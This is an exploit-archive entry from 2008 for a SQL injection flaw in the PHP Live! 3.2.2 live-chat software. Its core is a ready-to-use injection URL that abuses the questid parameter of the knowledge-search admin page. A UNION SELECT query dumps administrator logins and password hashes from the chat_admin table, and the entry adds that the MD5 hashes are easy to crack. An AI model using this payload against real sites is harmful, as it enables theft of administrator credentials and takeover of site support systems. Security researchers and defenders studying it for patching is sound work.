PHP Live! 3.2.2 - questid SQL Injection (1)

2008-02-14T00:00:00
ID EXPLOITPACK:F6DFB90DF6E5067D32F6D04F9E341E89
Type exploitpack
Reporter Xar
Modified 2008-02-14T00:00:00

Description

PHP Live! 3.2.2 - questid SQL Injection (1)

                                        
                                            [!]Info[!]

PHP Live! (© OSI Codes Inc.) enables live help and live customer support communication directly from your website. With PHP Live!, you can provide one-on-one chat assistance in real-time, answer visitor questions and add that extra human touch to your website.

[!]SQL Injection[!]

Code:
phplive//admin/traffic/knowledg
e_searchm.php?l=phplive&x=1&action=expand_question&questid=-1+union+all+select+1,2,3,4,5,6,concat(login,char(5,password),8+from+chat_admin--&deptid=2&catid=1&keyword=a

[!]Info[!]
+Hashes are regular md5 - easy to crack


Dork: "Find your own ;)"

Credits -

Found by Xar of h4ck-y0u

Greets to Don & ViSiOn

# milw0rm.com [2008-02-14]